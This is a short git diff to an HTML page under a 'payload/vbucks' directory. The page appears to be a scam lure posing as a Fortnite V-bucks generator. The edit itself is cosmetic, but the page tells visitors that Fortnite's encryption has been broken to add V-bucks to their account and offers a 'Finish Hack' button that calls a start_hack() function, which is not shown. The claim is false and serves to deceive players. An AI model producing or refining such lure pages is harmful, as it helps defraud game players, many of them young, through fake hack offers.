--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -102,10 +102,10 @@
                               <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Verification</h4>
                            </div>
                            <div class="content-ver">
-                              <p><span id="user-text2" ></span>, Fortnite's encryption algorithms have been broken in order to add V-bucks to your account.</p>
+                              <p><span id="user-text2"></span>, Fortnite's encryption algorithms have been broken in order to add V-bucks to your account.</p>
                               <div class="verify-btn center-block text-center">
                                  <div class="verify-btn-text">
-                                    <a onclick="start_hack();" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Finish Hack</a>
+                                    <a onclick="start_hack();" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">Finish Hack</a>
                                  </div>
                               </div>
                            </div>
